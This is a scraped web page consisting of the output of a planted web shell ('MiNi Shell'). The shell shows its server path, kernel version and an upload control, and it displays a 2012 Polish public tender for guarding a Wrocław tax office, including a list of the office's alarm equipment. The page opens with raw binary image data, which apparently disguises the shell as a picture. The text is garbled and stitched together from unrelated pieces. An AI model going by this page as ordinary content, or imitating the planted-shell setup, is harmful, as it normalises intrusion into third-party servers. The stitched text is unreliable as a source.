JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121105/432088-N-2012.html

<p class="kh_header"><b>Wrocław: Stała (bezpośrednia) całodobowa ochrona osób i mienia wraz z zapewnieniem grupy interwencyjnej w obiekcie Urzędu Skarbowego Wrocław - Fabryczna</b><br>
<b>Numer ogłoszenia: 432088 - 2012; data zamieszczenia: 05.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy Wrocław-Fabryczna , ul. Ostrowskiego 5, 53-238 Wrocław, woj. dolnośląskie, tel. 0-71 79 77 300, faks 0-71 79 75 603.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.us-fabryczna.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Stała (bezpośrednia) całodobowa ochrona osób i mienia wraz z zapewnieniem grupy interwencyjnej w obiekcie Urzędu Skarbowego Wrocław - Fabryczna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Stała (bezpośrednia) całodobowa ochrona osób i mienia wraz z zapewnieniem grupy interwencyjnej w obiekcie Urzędu Skarbowego Wrocław - Fabryczna, przedmiot zamówienia obejmuje kompleksową ochronę osób i mienia obejmującą parter, piętra I, II, III, IV, V wraz z terenem wokół budynku urzędu. 
Zamawiający wymaga, aby osoby pełniące służbę ochrony były zatrudnione przez Wykonawcę na umowie o pracę. Usługa ochrony będzie realizowana przez minimum 6 pracowników.
Ochrona osób i mienia będzie odbywać się przez 24 godziny na dobę wg niżej podanych warunków:
1. Czynności ochrony będą wykonywane:
- w dni robocze - całodobowo przez dwóch pracowników ochrony na zmianie posiadających licencje I bądź II stopnia;
- w dni wolne od pracy i święta:
a) w godz. 6:00 - 18:00 przez jednego pracownika ochrony posiadającego  licencje I bądź II stopnia;
b) w godz. 18:00 - 06:00 przez dwóch pracowników ochrony posiadających licencje I bądź II stopnia;

Posiadanie grupy interwencyjnej. Czas reakcji (dojazdu) grupy interwencyjnej nie może przekroczyć 10 minut. 
2. Wymagania dotyczące pracowników ochrony:
1) pracownicy ochrony muszą być przeszkoleni w zakresie BHP, ochrony p.poż.,
2) pracownicy ochrony muszą być jednolicie umundurowani i posiadać imienny identyfikator przypięty do ubrania w widocznym miejscu,
3) pracownicy ochrony muszą być wyposażeni w służbowy telefon komórkowy,
4) grupa interwencyjna musi dysponować pojazdem umożliwiającym natychmiastową interwencję,
5) grupa interwencyjna przynajmniej 4 razy w tygodniu musi prowadzić kontrole nocne pracowników ochrony pełniących służbę na obiekcie (z wpisem do książki pełnienia służby),
6) pracownicy ochrony w czasie pełnienia służby są obowiązani do wykonywania poleceń zamawiającego w zakresie porządku i pełnienia służby.
3. Kompleksowa ochrona osób i mienia obiektów Urzędu obejmuje również monitorowanie w zakresie wystąpienia awarii urządzeń dostawy mediów w chronionym obiekcie, systemów alarmowych, pożaru, klęsk żywiołowych itp. - obowiązek informowania o tych zdarzeniach właściwych służb oraz zamawiającego; monitorowanie będzie odbywać się przez elektroniczny system monitorowania oraz przez wykonywanie obchodów kontrolnych na zasadzie obserwacji całej infrastruktury technicznej chronionego obiektu.
4. Ochronie całodobowej podlega budynek Urzędu Skarbowego Wrocław - Fabryczna, ul. Ostrowskiego 5, teren przyległy do tego budynku.
5. Wykonawca zobowiązany będzie do stosowania przepisów:
- o ochronie informacji niejawnych,
- o ochronie danych osobowych,
- o ordynacji podatkowej w zakresie tajemnicy skarbowej,
- bezpieczeństwa i higieny pracy,
- przeciwpożarowych.
ZAKRES CZYNNOŚCI WCHODZĄCYCH W SKŁAD OCHRONY OSÓB I MIENIA 
I.
1) Stała (bezpośrednia) całodobowa ochrona osób i mienia wraz z zapewnieniem grupy interwencyjnej, której zadaniem będzie, w przypadku zgłoszenia lub potrzeby wsparcia dotarcie do ochranianego obiektu.
2) Obowiązkiem Wykonawcy jest zatrudnienie pracowników odpowiednio przeszkolonych, mających stosowną wiedzę w zakresie realizacji usług ochrony i mienia, czyli pracownicy powinni posiadać licencje pracownika ochrony fizycznej I lub II stopnia.
3) Zamawiający wymaga formy zatrudnienia pracowników na umowę o pracę. Wykonawca bierze odpowiedzialność za prawidłowe realizowanie świadczonej usługi zgodnie z wymogami przepisów prawa i wymaganiami Zamawiającego określonymi, w SIWZ. Pracownicy ochrony osób i mienia świadczący usługi na rzecz Urzędu, w imieniu Wykonawcy składającego ofertę w prowadzonym postępowaniu winni posiadać stosowne wymagania umożliwiające prawidłową realizację zadań, zgodnie z obowiązującymi przepisami prawa w przedmiotowym zakresie, zapewniając prawidłową realizację zgodnie z wydaną koncesją MSWiA. Wykonawca zobowiązany jest do realizacji umowy zgodnie z przepisami ustawy z dnia 22 sierpnia 1997roku o ochronie osób i mienia (tekst jednolity Dz. U. z 2005 roku Nr 145 poz. 1221ze zm.).
II.
Do czynności wchodzących w skład ochrony osób, obiektów i mienia należy w szczególności:
A) Ustalanie uprawnień do przebywania w ochranianym budynku oraz legitymowanie osób, w celu ustalenia ich tożsamości,
1)strzeżenie przed kradzieżą, zniszczeniem lub uszkodzeniem mienia znajdującego się 
w ochranianym obiekcie;
2)wezwanie osób do opuszczenia ochranianych pomieszczeń w przypadku stwierdzenia braku uprawnień do przebywania na ich terenie albo stwierdzenia zakłócania porządku;
3)ujęcie osób stwarzających zagrożenie dla życia, zdrowia lub nietykalności osobistej, a także dla chronionego mienia, w celu niezwłocznego przekazania tych osób Policji;
4)stosowanie środków przymusu bezpośredniego, o których mowa w art. 38 ust. 2 ustawy z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz.U z 2005 nr 145 poz. 1221 ze zm.), 
w przypadku zagrożenia dóbr powierzonych ochronie lub odparcia ataku na pracownika ochrony;
5)kontrola zamknięcia i zaplombowania pomieszczeń w chronionym budynku po godzinach pracy;
6)kontrola kluczy wydawanych pracownikom Urzędu;
7)wykonanie zadań punktu ostrzegania i alarmowania pracowników Urzędu (w razie zaistnienia zagrożeń instytucji);
8)pełnienie nadzoru nad stosowaniem się osób parkujących do zakazów parkowania na parkingach należących do Zamawiającego;
9)zapewnienie bezpieczeństwa pracowników Urzędu i petentów;
10)wspomaganie akcji ewakuacyjnej na wypadek zagrożenia;
11)obserwacje osób wchodzących do ochranianego obiektu;
12)podejmowanie niezbędnych interwencji w celu przywrócenia porządku publicznego;
13)przeciwdziałanie zamachom przestępczym;
14)współdziałanie ze służbami porządkowymi (ratowniczymi);
15)meldowanie o wszystkich nieprawidłowościach mających wpływ na obniżenie bezpieczeństwa obiektu Kierownikowi Działu OL-1 Urzędu Skarbowego Wrocław - Fabryczna;
16)niezwłocznego powiadamiania Policji oraz Straży Miejskiej w razie usiłowania dokonania kradzieży, włamania, dewastacji lub napadu, oraz przeciwdziałanie kradzieży i skutkom kradzieży;
17)niezwłoczne powiadamianie Pogotowia Ratunkowego w razie zaistnienia nieszczęśliwego wypadku;
18)niezwłoczne powiadamianie Straży Pożarnej w razie wystąpienia pożaru lub stwierdzenia próby podpalenia;
19)niezwłoczne powiadomienie Pogotowia Gazowego w razie stwierdzenia awarii instalacji gazowej lub wybuchu gazu;
20)prowadzenie książki dyżurów zawierającej imię i nazwisko pełniącego służbę, godzinę pełnienia służby, imiona i nazwiska osób przebywających na terenie obiektu po godzinach pracy Urzędu;
21)dopilnowanie, by osoby wchodzące budzące wątpliwości czy nie stanowią zagrożenia przechodziły kontrolę za pomocą ręcznego wykrywacza metali wykrywającego  przedmioty metalowe i dbanie o to, by na ochraniany teren  nie wchodziły osoby uzbrojone, poza osobami posiadającymi ustawowe uprawnienia do noszenia broni;
22)nie wpuszczanie na teren Urzędu osób po spożyciu alkoholu lub innych środków odurzających;
23)sprawdzenie zamknięcia drzwi głównych i bocznych;
24)sprawdzenie korytarzy i pomieszczeń pod kątem:
  a. nie pozostania w obiekcie osób nieuprawnionych;
  b. nie pozostawienia przedmiotów budzących podejrzenia wybuchu, 
   pożaru itp.;
25)Wykonawca zobowiązuje się do wyposażenia swoich pracowników pełniących ochronę w:
stosowne umundurowanie i oznakowanie imienne pracowników;
niezbędny sprzęt łączności bezprzewodowej z Wykonawcą;
ręczny wykrywacz metali.

B)Do czynności wchodzących w skład ochrony osób i mienia należy w szczególności:
- w dni robocze - całodobowo przez dwóch pracowników ochrony na zmianie posiadających licencje I bądź II stopnia;
- w dni wolne od pracy i święta:
a) w godz. 6:00 - 18:00 przez jednego pracownika ochrony posiadającego  licencje I bądź II stopnia;
b) w godz. 18:00 - 06:00 przez dwóch pracowników ochrony posiadających licencje I bądź II stopnia;
- w przypadku zagrożenia pracownik ochrony ma możliwość korzystania ze wsparcia załogą interwencyjną; 
- stałym dozorze sygnałów przesyłanych, gromadzonych i przetwarzanych w elektronicznych urządzeniach 
i systemach alarmowych zainstalowanych w Urzędzie;
- pracownik przeszkolony w zakresie obsługi systemu: sygnalizacji włamania i napadu, sygnalizacji alarmu pożaru i telewizji przemysłowej;
- Stałym nadzorze nad bezpieczeństwem i sprawności funkcjonowania obiektu Urzędu Skarbowego Wrocław - Fabryczna;
- Ochronie osób, które ma na celu zapewnienie bezpieczeństwa życia, zdrowia i nietykalności osobistej pracowników i interesantów Urzędu;
- Ochronie mienia, które ma zapobiegać przestępstwom i wykroczeniom przeciwko mieniu, a także zapobiegać powstawaniu szkód oraz nie dopuszczaniu do wstępu osób nieuprawnionych na teren chroniony;
- Niezwłocznym informowaniu upoważnionych przedstawicieli zamawiającego o wszelkich zdarzeniach istotnych dla bezpieczeństwa obiektu;
- Podejmowaniu wszelkich działań niezbędnych do prawidłowej realizacji usługi ochrony;
- Podejmowania innych czynności wyżej nie określonych, a niezbędnych do prawidłowego realizowania ochrony osób i mienia Urzędu Skarbowego Wrocław - Fabryczna.
Zakres ochrony osób, obiektu i mienia obejmuje ponadto:
-strzeżenie przed kradzieżą, zniszczeniem lub innymi aktami wandalizmu mienia oraz dokumentów zamawiającego;
Zapewnienie bezpieczeństwa zdrowia, życia i nietykalności osobistej pracowników i klientów zamawiającego;
- utrzymanie spokoju i porządku wśród klientów zamawiającego;
- ustalanie uprawnień do przebywania w ochranianym obiekcie oraz legitymowanie osób w celu ustalenia ich tożsamości;
- wezwanie osób do opuszczenia ochranianego obiektu w przypadku stwierdzenia braku uprawnień do przebywania na chronionym terenie albo stwierdzenie zakłócania porządku;
- ujęcie osób stwarzających zagrożenie dla życia, zdrowia lub nietykalności osobistej, a także dla chronionego mienia w celu niezwłocznego oddania tych osób policji;
- stosowanie środków przymusu bezpośredniego, o których mowa w art. 38 ust. 2 ustawy z dnia 22 sierpnia 1997r., o ochronie osób i mienia (t.j. Dz. U. z 2005, Nr 145, poz.1221 ze zm.) w przypadku zagrożenia dóbr powierzonych ochronie lub odparcia ataku na pracownika ochrony, pracowników lub klientów zamawiającego;
- kontrola prawidłowości zamknięć i zabezpieczeń pomieszczeń, okien oraz wyłączenie oświetlenia 
i odbiorników prądu elektrycznego mogących stanowić źródło pożaru, jak również sprawdzenie zamknięć kranów w sanitariatach chronionego budynku po godzinach urzędowania;
prowadzenie dokumentacji pełnienia służby ochrony;
zamawiający przekaże Wykonawcy wyciąg z Planu Ochrony Obiektu US Wrocław - Fabryczna oraz Zbiór instrukcji służby ochronnej US, w częściach dotyczących sprawowania ochrony fizycznej, 
a wykonawca zobowiązuje się do traktowania przekazanych informacji jako poufnych;
Ewentualne skutki finansowe związane z wyposażeniem pracowników Wykonawcy nie obciążają Zamawiającego.	

Zamawiający przekazuje informację dotyczące podstawowego wyposażenia Lokalnego Systemu Alarmowego:


L.p.	Nazwa urządzenia	Symbol urządzenia 	Ilość
1.	Centrala alarmowa	RP 296	             1
2.	Moduł rozszerzena	EZ 8	             1
3.	Klawiatura kodowa LCD	KCL	1
4.	Czujka MH 10 Crow	MH 10	13
5.	Czujka Zodiac	RK - 410 PR	1
6.          Sygnalizator akustyczny                   1
7.          Akumulator	17 Ah 12v	1.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że posiada koncesję na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia (zgodnie z przepisami ustawy o swobodzie działalności gospodarczej z dnia 02.07.2004r., t.j. Dz.U. z 2010r. Nr 220, poz.1447 z późn.zm.), licencje II stopnia oraz licencje I stopnia potwierdzające wymagania kwalifikacyjne pracowników ochrony (zgodnie z ustawą o ochronie osób i mienia z dnia 22.08.1997r. t.j. Dz.U. z 2005r. Nr 145, poz. 1221 z póź. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca jest:
- w dysponowaniu zmotoryzowaną i wyposażoną w środki przymusu bezpośredniego oraz łączności bezprzewodowej zewnętrznej i wewnętrznej minimum 2 osobową Grupą Interwencyjną.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca jest:
- w dysponowaniu minimum 6 osobami posiadającymi licencję pracownika ochrony fizycznej I bądź II stopnia przewidzianymi do realizacji przedmiotu umowy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli przedstawi:
opłaconą polisę na kwotę 150.000,00 zł, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.us-fabryczna.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy Wrocław - Fabryczna, ul. Ostrowskiego 5, 53-238 Wrocław, III piętro, pok. 327.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.11.2012 godzina 08:15, miejsce: Urząd Skarbowy Wrocław - Fabryczna, ul. Ostrowskiego 5, 53-238 Wrocław, III piętro, pok. 327.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com